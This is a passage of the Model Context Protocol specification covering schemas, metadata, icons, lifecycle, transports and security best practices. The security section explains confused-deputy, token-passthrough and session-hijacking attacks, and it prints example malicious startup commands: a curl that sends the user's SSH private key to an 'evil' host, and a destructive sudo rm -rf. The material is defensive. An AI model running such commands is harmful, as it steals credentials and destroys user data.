2. **Explicit dialect**: Schemas MAY include a `$schema` field to specify a different dialect
3. **Supported dialects**: Implementations MUST support at least 2020-12 and SHOULD document which additional dialects they support
4. **Recommendation**: Implementors are RECOMMENDED to use JSON Schema 2020-12.
### Example Usage
#### Default dialect (2020-12):
```json theme={null}
{
"type": "object",
"properties": {
"name": { "type": "string" },
"age": { "type": "integer", "minimum": 0 }
},
"required": ["name"]
}
```
#### Explicit dialect (draft-07):
```json theme={null}
{
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"name": { "type": "string" },
"age": { "type": "integer", "minimum": 0 }
},
"required": ["name"]
}
```
### Implementation Requirements
* Clients and servers **MUST** support JSON Schema 2020-12 for schemas without an explicit `$schema` field
* Clients and servers **MUST** validate schemas according to their declared or default dialect. They **MUST** handle unsupported dialects gracefully by returning an appropriate error indicating the dialect is not supported.
* Clients and servers **SHOULD** document which schema dialects they support
### Schema Validation
* Schemas **MUST** be valid according to their declared or default dialect
## General fields
### `_meta`
The `_meta` property/parameter is reserved by MCP to allow clients and servers
to attach additional metadata to their interactions.
Certain key names are reserved by MCP for protocol-level metadata, as specified below;
implementations MUST NOT make assumptions about values at these keys.
Additionally, definitions in the [schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts)
may reserve particular names for purpose-specific metadata, as declared in those definitions.
**Key name format:** valid `_meta` key names have two segments: an optional **prefix**, and a **name**.
**Prefix:**
* If specified, MUST be a series of labels separated by dots (`.`), followed by a slash (`/`).
* Labels MUST start with a letter and end with a letter or digit; interior characters can be letters, digits, or hyphens (`-`).
* Implementations SHOULD use reverse DNS notation (e.g., `com.example/` rather than `example.com/`).
* Any prefix where the second label is `modelcontextprotocol` or `mcp` is **reserved** for MCP use.
* For example: `io.modelcontextprotocol/`, `dev.mcp/`, `org.modelcontextprotocol.api/`, and `com.mcp.tools/` are all reserved.
* However, `com.example.mcp/` is NOT reserved, as the second label is `example`.
**Name:**
* Unless empty, MUST begin and end with an alphanumeric character (`[a-z0-9A-Z]`).
* MAY contain hyphens (`-`), underscores (`_`), dots (`.`), and alphanumerics in between.
### `icons`
The `icons` property provides a standardized way for servers to expose visual identifiers for their resources, tools, prompts, and implementations. Icons enhance user interfaces by providing visual context and improving the discoverability of available functionality.
Icons are represented as an array of `Icon` objects, where each icon includes:
* `src`: A URI pointing to the icon resource (required). This can be:
* An HTTP/HTTPS URL pointing to an image file
* A data URI with base64-encoded image data
* `mimeType`: Optional MIME type if the server's type is missing or generic
* `sizes`: Optional array of size specifications (e.g., `["48x48"]`, `["any"]` for scalable formats like SVG, or `["48x48", "96x96"]` for multiple sizes)
* `theme`: Optional theme preference (`light` or `dark`) for the icon background
**Required MIME type support:**
Clients that support rendering icons **MUST** support at least the following MIME types:
* `image/png` - PNG images (safe, universal compatibility)
* `image/jpeg` (and `image/jpg`) - JPEG images (safe, universal compatibility)
Clients that support rendering icons **SHOULD** also support:
* `image/svg+xml` - SVG images (scalable but requires security precautions as noted below)
* `image/webp` - WebP images (modern, efficient format)
**Security considerations:**
Consumers of icon metadata **MUST** take appropriate security precautions when handling icons to prevent compromise:
* Treat icon metadata and icon bytes as untrusted inputs and defend against network, privacy, and parsing risks.
* Ensure that the icon URI is either a HTTPS or `data:` URI. Clients **MUST** reject icon URIs that use unsafe schemes and redirects, such as `javascript:`, `file:`, `ftp:`, `ws:`, or local app URI schemes.
* Disallow scheme changes and redirects to hosts on different origins.
* Be resilient against resource exhaustion attacks stemming from oversized images, large dimensions, or excessive frames (e.g., in GIFs).
* Consumers **MAY** set limits for image and content size.
* Fetch icons without credentials. Do not send cookies, `Authorization` headers, or client credentials.
* Verify that icon URIs are from the same origin as the server. This minimizes the risk of exposing data or tracking information to third-parties.
* Exercise caution when fetching and rendering icons as the payload **MAY** contain executable content (e.g., SVG with [embedded JavaScript](https://www.w3.org/TR/SVG11/script.html) or [extended capabilities](https://www.w3.org/TR/SVG11/extend.html)).
* Consumers **MAY** choose to disallow specific file types or otherwise sanitize icon files before rendering.
* Validate MIME types and file contents before rendering. Treat the MIME type information as advisory. Detect content type via magic bytes; reject on mismatch or unknown types.
* Maintain a strict allowlist of image types.
**Usage:**
Icons can be attached to:
* `Implementation`: Visual identifier for the MCP server/client implementation
* `Tool`: Visual representation of the tool's functionality
* `Prompt`: Icon to display alongside prompt templates
* `Resource`: Visual indicator for different resource types
Multiple icons can be provided to support different display contexts and resolutions. Clients should select the most appropriate icon based on their UI requirements.
# Lifecycle
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/lifecycle
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) defines a rigorous lifecycle for client-server
connections that ensures proper capability negotiation and state management.
1. **Initialization**: Capability negotiation and protocol version agreement
2. **Operation**: Normal protocol communication
3. **Shutdown**: Graceful termination of the connection
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Initialization Phase
activate Client
Client->>+Server: initialize request
Server-->>Client: initialize response
Client--)Server: initialized notification
Note over Client,Server: Operation Phase
rect rgb(200, 220, 250)
note over Client,Server: Normal protocol operations
end
Note over Client,Server: Shutdown
Client--)-Server: Disconnect
deactivate Server
Note over Client,Server: Connection closed
```
## Lifecycle Phases
### Initialization
The initialization phase **MUST** be the first interaction between client and server.
During this phase, the client and server:
* Establish protocol version compatibility
* Exchange and negotiate capabilities
* Share implementation details
The client **MUST** initiate this phase by sending an `initialize` request containing:
* Protocol version supported
* Client capabilities
* Client implementation information
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-11-25",
"capabilities": {
"roots": {
"listChanged": true
},
"sampling": {},
"elicitation": {
"form": {},
"url": {}
},
"tasks": {
"requests": {
"elicitation": {
"create": {}
},
"sampling": {
"createMessage": {}
}
}
}
},
"clientInfo": {
"name": "ExampleClient",
"title": "Example Client Display Name",
"version": "1.0.0",
"description": "An example MCP client application",
"icons": [
{
"src": "https://example.com/icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
],
"websiteUrl": "https://example.com"
}
}
}
```
The server **MUST** respond with its own capabilities and information:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-11-25",
"capabilities": {
"logging": {},
"prompts": {
"listChanged": true
},
"resources": {
"subscribe": true,
"listChanged": true
},
"tools": {
"listChanged": true
},
"tasks": {
"list": {},
"cancel": {},
"requests": {
"tools": {
"call": {}
}
}
}
},
"serverInfo": {
"name": "ExampleServer",
"title": "Example Server Display Name",
"version": "1.0.0",
"description": "An example MCP server providing tools and resources",
"icons": [
{
"src": "https://example.com/server-icon.svg",
"mimeType": "image/svg+xml",
"sizes": ["any"]
}
],
"websiteUrl": "https://example.com/server"
},
"instructions": "Optional instructions for the client"
}
}
```
After successful initialization, the client **MUST** send an `initialized` notification
to indicate it is ready to begin normal operations:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/initialized"
}
```
* The client **SHOULD NOT** send requests other than
[pings](/specification/2025-11-25/basic/utilities/ping) before the server has responded to the
`initialize` request.
* The server **SHOULD NOT** send requests other than
[pings](/specification/2025-11-25/basic/utilities/ping) and
[logging](/specification/2025-11-25/server/utilities/logging) before receiving the `initialized`
notification.
#### Version Negotiation
In the `initialize` request, the client **MUST** send a protocol version it supports.
This **SHOULD** be the *latest* version supported by the client.
If the server supports the requested protocol version, it **MUST** respond with the same
version. Otherwise, the server **MUST** respond with another protocol version it
supports. This **SHOULD** be the *latest* version supported by the server.
If the client does not support the version in the server's response, it **SHOULD**
disconnect.
If using HTTP, the client **MUST** include the `MCP-Protocol-Version: ` HTTP header on all subsequent requests to the MCP
server.
For details, see [the Protocol Version Header section in Transports](/specification/2025-11-25/basic/transports#protocol-version-header).
#### Capability Negotiation
Client and server capabilities establish which optional protocol features will be
available during the session.
Key capabilities include:
| Category | Capability | Description |
| -------- | -------------- | --------------------------------------------------------------------------------------------- |
| Client | `roots` | Ability to provide filesystem [roots](/specification/2025-11-25/client/roots) |
| Client | `sampling` | Support for LLM [sampling](/specification/2025-11-25/client/sampling) requests |
| Client | `elicitation` | Support for server [elicitation](/specification/2025-11-25/client/elicitation) requests |
| Client | `tasks` | Support for [task-augmented](/specification/2025-11-25/basic/utilities/tasks) client requests |
| Client | `experimental` | Describes support for non-standard experimental features |
| Server | `prompts` | Offers [prompt templates](/specification/2025-11-25/server/prompts) |
| Server | `resources` | Provides readable [resources](/specification/2025-11-25/server/resources) |
| Server | `tools` | Exposes callable [tools](/specification/2025-11-25/server/tools) |
| Server | `logging` | Emits structured [log messages](/specification/2025-11-25/server/utilities/logging) |
| Server | `completions` | Supports argument [autocompletion](/specification/2025-11-25/server/utilities/completion) |
| Server | `tasks` | Support for [task-augmented](/specification/2025-11-25/basic/utilities/tasks) server requests |
| Server | `experimental` | Describes support for non-standard experimental features |
Capability objects can describe sub-capabilities like:
* `listChanged`: Support for list change notifications (for prompts, resources, and
tools)
* `subscribe`: Support for subscribing to individual items' changes (resources only)
### Operation
During the operation phase, the client and server exchange messages according to the
negotiated capabilities.
Both parties **MUST**:
* Respect the negotiated protocol version
* Only use capabilities that were successfully negotiated
### Shutdown
During the shutdown phase, one side (usually the client) cleanly terminates the protocol
connection. No specific shutdown messages are defined—instead, the underlying transport
mechanism should be used to signal connection termination:
#### stdio
For the stdio [transport](/specification/2025-11-25/basic/transports), the client **SHOULD** initiate
shutdown by:
1. First, closing the input stream to the child process (the server)
2. Waiting for the server to exit, or sending `SIGTERM` if the server does not exit
within a reasonable time
3. Sending `SIGKILL` if the server does not exit within a reasonable time after `SIGTERM`
The server **MAY** initiate shutdown by closing its output stream to the client and
exiting.
#### HTTP
For HTTP [transports](/specification/2025-11-25/basic/transports), shutdown is indicated by closing the
associated HTTP connection(s).
## Timeouts
Implementations **SHOULD** establish timeouts for all sent requests, to prevent hung
connections and resource exhaustion. When the request has not received a success or error
response within the timeout period, the sender **SHOULD** issue a [cancellation
notification](/specification/2025-11-25/basic/utilities/cancellation) for that request and stop waiting for
a response.
SDKs and other middleware **SHOULD** allow these timeouts to be configured on a
per-request basis.
Implementations **MAY** choose to reset the timeout clock when receiving a [progress
notification](/specification/2025-11-25/basic/utilities/progress) corresponding to the request, as this
implies that work is actually happening. However, implementations **SHOULD** always
enforce a maximum timeout, regardless of progress notifications, to limit the impact of a
misbehaving client or server.
## Error Handling
Implementations **SHOULD** be prepared to handle these error cases:
* Protocol version mismatch
* Failure to negotiate required capabilities
* Request [timeouts](#timeouts)
Example initialization error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32602,
"message": "Unsupported protocol version",
"data": {
"supported": ["2024-11-05"],
"requested": "1.0.0"
}
}
}
```
# Security Best Practices
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/security_best_practices
## Introduction
### Purpose and Scope
This document provides security considerations for the Model Context Protocol (MCP), complementing the [MCP Authorization](../basic/authorization) specification. This document identifies security risks, attack vectors, and best practices specific to MCP implementations.
The primary audience for this document includes developers implementing MCP authorization flows, MCP server operators, and security professionals evaluating MCP-based systems. This document should be read alongside the MCP Authorization specification and [OAuth 2.0 security best practices](https://datatracker.ietf.org/doc/html/rfc9700).
## Attacks and Mitigations
This section gives a detailed description of attacks on MCP implementations, along with potential countermeasures.
### Confused Deputy Problem
Attackers can exploit MCP proxy servers that connect to third-party APIs, creating "[confused deputy](https://en.wikipedia.org/wiki/Confused_deputy_problem)" vulnerabilities. This attack allows malicious clients to obtain authorization codes without proper user consent by exploiting the combination of static client IDs, dynamic client registration, and consent cookies.
#### Terminology
**MCP Proxy Server**
: An MCP server that connects MCP clients to third-party APIs, offering MCP features while delegating operations and acting as a single OAuth client to the third-party API server.
**Third-Party Authorization Server**
: Authorization server that protects the third-party API. It may lack dynamic client registration support, requiring the MCP proxy to use a static client ID for all requests.
**Third-Party API**
: The protected resource server that provides the actual API functionality. Access to this
API requires tokens issued by the third-party authorization server.
**Static Client ID**
: A fixed OAuth 2.0 client identifier used by the MCP proxy server when communicating with
the third-party authorization server. This Client ID refers to the MCP server acting as a client
to the Third-Party API. It is the same value for all MCP server to Third-Party API interactions regardless of
which MCP client initiated the request.
#### Vulnerable Conditions
This attack becomes possible when all of the following conditions are present:
* MCP proxy server uses a **static client ID** with a third-party authorization server
* MCP proxy server allows MCP clients to **dynamically register** (each getting their own client\_id)
* The third-party authorization server sets a **consent cookie** after the first authorization
* MCP proxy server does not implement proper per-client consent before forwarding to third-party authorization
#### Architecture and Attack Flows
##### Normal OAuth proxy usage (preserves user consent)
```mermaid theme={null}
sequenceDiagram
participant UA as User-Agent (Browser)
participant MC as MCP Client
participant M as MCP Proxy Server
participant TAS as Third-Party Authorization Server
Note over UA,M: Initial Auth flow completed
Note over UA,TAS: Step 1: Legitimate user consent for Third Party Server
M->>UA: Redirect to third party authorization server
UA->>TAS: Authorization request (client_id: mcp-proxy)
TAS->>UA: Authorization consent screen
Note over UA: Review consent screen
UA->>TAS: Approve
TAS->>UA: Set consent cookie for client ID: mcp-proxy
TAS->>UA: 3P Authorization code + redirect to mcp-proxy-server.com
UA->>M: 3P Authorization code
Note over M,TAS: Exchange 3P code for 3P token
Note over M: Generate MCP authorization code
M->>UA: Redirect to MCP Client with MCP authorization code
Note over M,UA: Exchange code for token, etc.
```
##### Malicious OAuth proxy usage (skips user consent)
```mermaid theme={null}
sequenceDiagram
participant UA as User-Agent (Browser)
participant M as MCP Proxy Server
participant TAS as Third-Party Authorization Server
participant A as Attacker
Note over UA,A: Step 2: Attack (leveraging existing cookie, skipping consent)
A->>M: Dynamically register malicious client, redirect_uri: attacker.com
A->>UA: Sends malicious link
UA->>TAS: Authorization request (client_id: mcp-proxy) + consent cookie
rect rgba(255, 17, 0, 0.67)
TAS->>TAS: Cookie present, consent skipped
end
TAS->>UA: 3P Authorization code + redirect to mcp-proxy-server.com
UA->>M: 3P Authorization code
Note over M,TAS: Exchange 3P code for 3P token
Note over M: Generate MCP authorization code
M->>UA: Redirect to attacker.com with MCP Authorization code
UA->>A: MCP Authorization code delivered to attacker.com
Note over M,A: Attacker exchanges MCP code for MCP token
A->>M: Attacker impersonates user to MCP server
```
#### Attack Description
When an MCP proxy server uses a static client ID to authenticate with a third-party
authorization server, the following attack becomes possible:
1. A user authenticates normally through the MCP proxy server to access the third-party API
2. During this flow, the third-party authorization server sets a cookie on the user agent
indicating consent for the static client ID
3. An attacker later sends the user a malicious link containing a crafted authorization request which contains a malicious redirect URI along with a new dynamically registered client ID
4. When the user clicks the link, their browser still has the consent cookie from the previous legitimate request
5. The third-party authorization server detects the cookie and skips the consent screen
6. The MCP authorization code is redirected to the attacker's server (specified in the malicious `redirect_uri` parameter during [dynamic client registration](/specification/2025-11-25/basic/authorization#dynamic-client-registration))
7. The attacker exchanges the stolen authorization code for access tokens for the MCP server without the user's explicit approval
8. The attacker now has access to the third-party API as the compromised user
#### Mitigation
To prevent confused deputy attacks, MCP proxy servers **MUST** implement per-client consent and proper security controls as detailed below.
##### Consent Flow Implementation
The following diagram shows how to properly implement per-client consent that runs **before** the third-party authorization flow:
```mermaid theme={null}
sequenceDiagram
participant Client as MCP Client
participant Browser as User's Browser
participant MCP as MCP Server
participant ThirdParty as Third-Party AuthZ Server
Note over Client,ThirdParty: 1. Client Registration (Dynamic)
Client->>MCP: Register with redirect_uri
MCP-->>Client: client_id
Note over Client,ThirdParty: 2. Authorization Request
Client->>Browser: Open MCP server authorization URL
Browser->>MCP: GET /authorize?client_id=...&redirect_uri=...
alt Check MCP Server Consent
MCP->>MCP: Check consent for this client_id
Note over MCP: Not previously approved
end
MCP->>Browser: Show MCP server-owned consent page
Note over Browser: "Allow [Client Name] to access [Third-Party API]?"
Browser->>MCP: POST /consent (approve)
MCP->>MCP: Store consent decision for client_id
Note over Client,ThirdParty: 3. Forward to Third-Party
MCP->>Browser: Redirect to third-party /authorize
Note over MCP: Use static client_id for third-party
Browser->>ThirdParty: Authorization request (static client_id)
ThirdParty->>Browser: User authenticates & consents
ThirdParty->>Browser: Redirect with auth code
Browser->>MCP: Callback with third-party code
MCP->>ThirdParty: Exchange code for token (using static client_id)
MCP->>Browser: Redirect to client's registered redirect_uri
```
##### Required Protections
**Per-Client Consent Storage**
MCP proxy servers **MUST**:
* Maintain a registry of approved `client_id` values per user
* Check this registry **before** initiating the third-party authorization flow
* Store consent decisions securely (server-side database, or server specific cookies)
**Consent UI Requirements**
The MCP-level consent page **MUST**:
* Clearly identify the requesting MCP client by name
* Display the specific third-party API scopes being requested
* Show the registered `redirect_uri` where tokens will be sent
* Implement CSRF protection (e.g., state parameter, CSRF tokens)
* Prevent iframing via `frame-ancestors` CSP directive or `X-Frame-Options: DENY` to prevent clickjacking
**Consent Cookie Security**
If using cookies to track consent decisions, they **MUST**:
* Use `__Host-` prefix for cookie names
* Set `Secure`, `HttpOnly`, and `SameSite=Lax` attributes
* Be cryptographically signed or use server-side sessions
* Bind to the specific `client_id` (not just "user has consented")
**Redirect URI Validation**
The MCP proxy server **MUST**:
* Validate that the `redirect_uri` in authorization requests exactly matches the registered URI
* Reject requests if the `redirect_uri` has changed without re-registration
* Use exact string matching (not pattern matching or wildcards)
**OAuth State Parameter Validation**
The OAuth `state` parameter is critical to prevent authorization code interception and CSRF attacks. Proper state validation ensures that consent approval at the authorization endpoint is enforced at the callback endpoint.
MCP proxy servers implementing OAuth flows **MUST**:
* Generate a cryptographically secure random `state` value for each authorization request
* Store the `state` value server-side (in a secure session store or encrypted cookie) **only after** consent has been explicitly approved
* Set the `state` tracking cookie/session **immediately before** redirecting to the third-party identity provider (not before consent approval)
* Validate at the callback endpoint that the `state` query parameter exactly matches the stored value in the callback request's cookies or in the request's cookie-based session
* Reject any callback requests where the `state` parameter is missing or does not match
* Ensure `state` values are single-use (delete after validation) and have a short expiration time (e.g., 10 minutes)
The consent cookie or session containing the `state` value **MUST NOT** be set until **after** the user has approved the consent screen at the MCP server's authorization endpoint. Setting this cookie before consent approval renders the consent screen ineffective, as an attacker could bypass it by crafting a malicious authorization request.
### Token Passthrough
"Token passthrough" is an anti-pattern where an MCP server accepts tokens from an MCP client without validating that the tokens were properly issued *to the MCP server* and passes them through to the downstream API.
#### Risks
Token passthrough is explicitly forbidden in the [authorization specification](/specification/2025-11-25/basic/authorization) as it introduces a number of security risks, that include:
* **Security Control Circumvention**
* The MCP Server or downstream APIs might implement important security controls like rate limiting, request validation, or traffic monitoring, that depend on the token audience or other credential constraints. If clients can obtain and use tokens directly with the downstream APIs without the MCP server validating them properly or ensuring that the tokens are issued for the right service, they bypass these controls.
* **Accountability and Audit Trail Issues**
* The MCP Server will be unable to identify or distinguish between MCP Clients when clients are calling with an upstream-issued access token which may be opaque to the MCP Server.
* The downstream Resource Server’s logs may show requests that appear to come from a different source with a different identity, rather than the MCP server that is actually forwarding the tokens.
* Both factors make incident investigation, controls, and auditing more difficult.
* If the MCP Server passes tokens without validating their claims (e.g., roles, privileges, or audience) or other metadata, a malicious actor in possession of a stolen token can use the server as a proxy for data exfiltration.
* **Trust Boundary Issues**
* The downstream Resource Server grants trust to specific entities. This trust might include assumptions about origin or client behavior patterns. Breaking this trust boundary could lead to unexpected issues.
* If the token is accepted by multiple services without proper validation, an attacker compromising one service can use the token to access other connected services.
* **Future Compatibility Risk**
* Even if an MCP Server starts as a "pure proxy" today, it might need to add security controls later. Starting with proper token audience separation makes it easier to evolve the security model.
#### Mitigation
MCP servers **MUST NOT** accept any tokens that were not explicitly issued for the MCP server.
### Session Hijacking
Session hijacking is an attack vector where a client is provided a session ID by the server, and an unauthorized party is able to obtain and use that same session ID to impersonate the original client and perform unauthorized actions on their behalf.
#### Session Hijack Prompt Injection
```mermaid theme={null}
sequenceDiagram
participant Client
participant ServerA
participant Queue
participant ServerB
participant Attacker
Client->>ServerA: Initialize (connect to streamable HTTP server)
ServerA-->>Client: Respond with session ID
Attacker->>ServerB: Access/guess session ID
Note right of Attacker: Attacker knows/guesses session ID
Attacker->>ServerB: Trigger event (malicious payload, using session ID)
ServerB->>Queue: Enqueue event (keyed by session ID)
ServerA->>Queue: Poll for events (using session ID)
Queue-->>ServerA: Event data (malicious payload)
ServerA-->>Client: Async response (malicious payload)
Client->>Client: Acts based on malicious payload
```
#### Session Hijack Impersonation
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
participant Attacker
Client->>Server: Initialize (login/authenticate)
Server-->>Client: Respond with session ID (persistent session created)
Attacker->>Server: Access/guess session ID
Note right of Attacker: Attacker knows/guesses session ID
Attacker->>Server: Make API call (using session ID, no re-auth)
Server-->>Attacker: Respond as if Attacker is Client (session hijack)
```
#### Attack Description
When you have multiple stateful HTTP servers that handle MCP requests, the following attack vectors are possible:
**Session Hijack Prompt Injection**
1. The client connects to **Server A** and receives a session ID.
2. The attacker obtains an existing session ID and sends a malicious event to **Server B** with said session ID.
* When a server supports [redelivery/resumable streams](/specification/2025-11-25/basic/transports#resumability-and-redelivery), deliberately terminating the request before receiving the response could lead to it being resumed by the original client via the GET request for server sent events.
* If a particular server initiates server sent events as a consequence of a tool call such as a `notifications/tools/list_changed`, where it is possible to affect the tools that are offered by the server, a client could end up with tools that they were not aware were enabled.
3. **Server B** enqueues the event (associated with session ID) into a shared queue.
4. **Server A** polls the queue for events using the session ID and retrieves the malicious payload.
5. **Server A** sends the malicious payload to the client as an asynchronous or resumed response.
6. The client receives and acts on the malicious payload, leading to potential compromise.
**Session Hijack Impersonation**
1. The MCP client authenticates with the MCP server, creating a persistent session ID.
2. The attacker obtains the session ID.
3. The attacker makes calls to the MCP server using the session ID.
4. MCP server does not check for additional authorization and treats the attacker as a legitimate user, allowing unauthorized access or actions.
#### Mitigation
To prevent session hijacking and event injection attacks, the following mitigations should be implemented:
MCP servers that implement authorization **MUST** verify all inbound requests.
MCP Servers **MUST NOT** use sessions for authentication.
MCP servers **MUST** use secure, non-deterministic session IDs.
Generated session IDs (e.g., UUIDs) **SHOULD** use secure random number generators. Avoid predictable or sequential session identifiers that could be guessed by an attacker. Rotating or expiring session IDs can also reduce the risk.
MCP servers **SHOULD** bind session IDs to user-specific information.
When storing or transmitting session-related data (e.g., in a queue), combine the session ID with information unique to the authorized user, such as their internal user ID. Use a key format like `:`. This ensures that even if an attacker guesses a session ID, they cannot impersonate another user as the user ID is derived from the user token and not provided by the client.
MCP servers can optionally leverage additional unique identifiers.
### Local MCP Server Compromise
Local MCP servers are MCP Servers running on a user's local machine, either by the user downloading and executing a server, authoring a server themselves, or installing through a client's configuration flows. These servers may have direct access to the user's system and may be accessible to other processes running on the user's machine, making them attractive targets for attacks.
#### Attack Description
Local MCP servers are binaries that are downloaded and executed on the same machine as the MCP client. Without proper sandboxing and consent requirements in place, the following attacks become possible:
1. An attacker includes a malicious "startup" command in a client configuration
2. An attacker distributes a malicious payload inside the server itself
3. An attacker accesses an insecure local server that's left running on localhost via DNS rebinding
Example malicious startup commands that could be embedded:
```bash theme={null}
# Data exfiltration
npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil-location
# Privilege escalation
sudo rm -rf /important/system/files && echo "MCP server installed!"
```
#### Risks
Local MCP servers with inadequate restrictions or from untrusted sources introduce several critical security risks:
* **Arbitrary code execution**. Attackers can execute any command with MCP client privileges.
* **No visibility**. Users have no insight into what commands are being executed.
* **Command obfuscation**. Malicious actors can use complex or convoluted commands to appear legitimate.
* **Data exfiltration**. Attackers can access legitimate local MCP servers via compromised javascript.
* **Data loss**. Attackers or bugs in legitimate servers could lead to irrecoverable data loss on the host machine.
#### Mitigation
If an MCP client supports one-click local MCP server configuration, it **MUST** implement proper consent mechanisms prior to executing commands.
**Pre-Configuration Consent**
Display a clear consent dialog before connecting a new local MCP server via one-click configuration. The MCP client **MUST**:
* Show the exact command that will be executed, without truncation (include arguments and parameters)
* Clearly identify it as a potentially dangerous operation that executes code on the user's system
* Require explicit user approval before proceeding
* Allow users to cancel the configuration
The MCP client **SHOULD** implement additional checks and guardrails to mitigate potential code execution attack vectors:
* Highlight potentially dangerous command patterns (e.g., commands containing `sudo`, `rm -rf`, network operations, file system access outside expected directories)
* Display warnings for commands that access sensitive locations (home directory, SSH keys, system directories)
* Warn that MCP servers run with the same privileges as the client
* Execute MCP server commands in a sandboxed environment with minimal default privileges
* Launch MCP servers with restricted access to the file system, network, and other system resources
* Provide mechanisms for users to explicitly grant additional privileges (e.g., specific directory access, network access) when needed
* Use platform-appropriate sandboxing technologies (containers, chroot, application sandboxes, etc.)
MCP servers intending for their servers to be run locally **SHOULD** implement measures to prevent unauthorized usage from malicious processes:
* Use the `stdio` transport to limit access to just the MCP client
* Restrict access if using an HTTP transport, such as:
* Require an authorization token
* Use unix domain sockets or other Interprocess Communication (IPC) mechanisms with restricted access
### Scope Minimization
Poor scope design increases token compromise impact, elevates user friction, and obscures audit trails.
#### Attack Description
An attacker obtains (via log leakage, memory scraping, or local interception) an access token carrying broad scopes (`files:*`, `db:*`, `admin:*`) that were granted up front because the MCP server exposed every scope in `scopes_supported` and the client requested them all. The token enables lateral data access, privilege chaining, and difficult revocation without re-consenting the entire surface.
#### Risks
* Expanded blast radius: stolen broad token enables unrelated tool/resource access
* Higher friction on revocation: revoking a max-privilege token disrupts all workflows
* Audit noise: single omnibus scope masks user intent per operation
* Privilege chaining: attacker can immediately invoke high-risk tools without further elevation prompts
* Consent abandonment: users decline dialogs listing excessive scopes
* Scope inflation blindness: lack of metrics makes over-broad requests normalised
#### Mitigation
Implement a progressive, least-privilege scope model:
* Minimal initial scope set (e.g., `mcp:tools-basic`) containing only low-risk discovery/read operations
* Incremental elevation via targeted `WWW-Authenticate` `scope="..."` challenges when privileged operations are first attempted
* Down-scoping tolerance: server should accept reduced scope tokens; auth server MAY issue a subset of requested scopes
Server guidance:
* Emit precise scope challenges; avoid returning the full catalog
* Log elevation events (scope requested, granted subset) with correlation IDs
Client guidance:
* Begin with only baseline scopes (or those specified by initial `WWW-Authenticate`)
* Cache recent failures to avoid repeated elevation loops for denied scopes
#### Common Mistakes
* Publishing all possible scopes in `scopes_supported`
* Using wildcard or omnibus scopes (`*`, `all`, `full-access`)
* Bundling unrelated privileges to preempt future prompts
* Returning entire scope catalog in every challenge
* Silent scope semantic changes without versioning
* Treating claimed scopes in token as sufficient without server-side authorization logic
Proper minimization constrains compromise impact, improves audit clarity, and reduces consent churn.
# Transports
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/transports
**Protocol Revision**: 2025-11-25
MCP uses JSON-RPC to encode messages. JSON-RPC messages **MUST** be UTF-8 encoded.
The protocol currently defines two standard transport mechanisms for client-server
communication:
1. [stdio](#stdio), communication over standard in and standard out
2. [Streamable HTTP](#streamable-http)
Clients **SHOULD** support stdio whenever possible.
It is also possible for clients and servers to implement
[custom transports](#custom-transports) in a pluggable fashion.
## stdio
In the **stdio** transport:
* The client launches the MCP server as a subprocess.
* The server reads JSON-RPC messages from its standard input (`stdin`) and sends messages
to its standard output (`stdout`).
* Messages are individual JSON-RPC requests, notifications, or responses.
* Messages are delimited by newlines, and **MUST NOT** contain embedded newlines.
* The server **MAY** write UTF-8 strings to its standard error (`stderr`) for any
logging purposes including informational, debug, and error messages.
* The client **MAY** capture, forward, or ignore the server's `stderr` output
and **SHOULD NOT** assume `stderr` output indicates error conditions.
* The server **MUST NOT** write anything to its `stdout` that is not a valid MCP message.
* The client **MUST NOT** write anything to the server's `stdin` that is not a valid MCP
message.
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server Process
Client->>+Server Process: Launch subprocess
loop Message Exchange
Client->>Server Process: Write to stdin
Server Process->>Client: Write to stdout
Server Process--)Client: Optional logs on stderr
end
Client->>Server Process: Close stdin, terminate subprocess
deactivate Server Process
```
## Streamable HTTP
This replaces the [HTTP+SSE
transport](/specification/2024-11-05/basic/transports#http-with-sse) from
protocol version 2024-11-05. See the [backwards compatibility](#backwards-compatibility)
guide below.
In the **Streamable HTTP** transport, the server operates as an independent process that
can handle multiple client connections. This transport uses HTTP POST and GET requests.
Server can optionally make use of
[Server-Sent Events](https://en.wikipedia.org/wiki/Server-sent_events) (SSE) to stream
multiple server messages. This permits basic MCP servers, as well as more feature-rich
servers supporting streaming and server-to-client notifications and requests.
The server **MUST** provide a single HTTP endpoint path (hereafter referred to as the
**MCP endpoint**) that supports both POST and GET methods. For example, this could be a
URL like `https://example.com/mcp`.
#### Security Warning
When implementing Streamable HTTP transport:
1. Servers **MUST** validate the `Origin` header on all incoming connections to prevent DNS rebinding attacks
* If the `Origin` header is present and invalid, servers **MUST** respond with HTTP 403 Forbidden. The HTTP response
body **MAY** comprise a JSON-RPC *error response* that has no `id`
2. When running locally, servers **SHOULD** bind only to localhost (127.0.0.1) rather than all network interfaces (0.0.0.0)
3. Servers **SHOULD** implement proper authentication for all connections
Without these protections, attackers could use DNS rebinding to interact with local MCP servers from remote websites.
### Sending Messages to the Server
Every JSON-RPC message sent from the client **MUST** be a new HTTP POST request to the
MCP endpoint.
1. The client **MUST** use HTTP POST to send JSON-RPC messages to the MCP endpoint.
2. The client **MUST** include an `Accept` header, listing both `application/json` and
`text/event-stream` as supported content types.
3. The body of the POST request **MUST** be a single JSON-RPC *request*, *notification*, or *response*.
4. If the input is a JSON-RPC *response* or *notification*:
* If the server accepts the input, the server **MUST** return HTTP status code 202
Accepted with no body.
* If the server cannot accept the input, it **MUST** return an HTTP error status code
(e.g., 400 Bad Request). The HTTP response body **MAY** comprise a JSON-RPC *error
response* that has no `id`.
5. If the input is a JSON-RPC *request*, the server **MUST** either
return `Content-Type: text/event-stream`, to initiate an SSE stream, or
`Content-Type: application/json`, to return one JSON object. The client **MUST**
support both these cases.
6. If the server initiates an SSE stream:
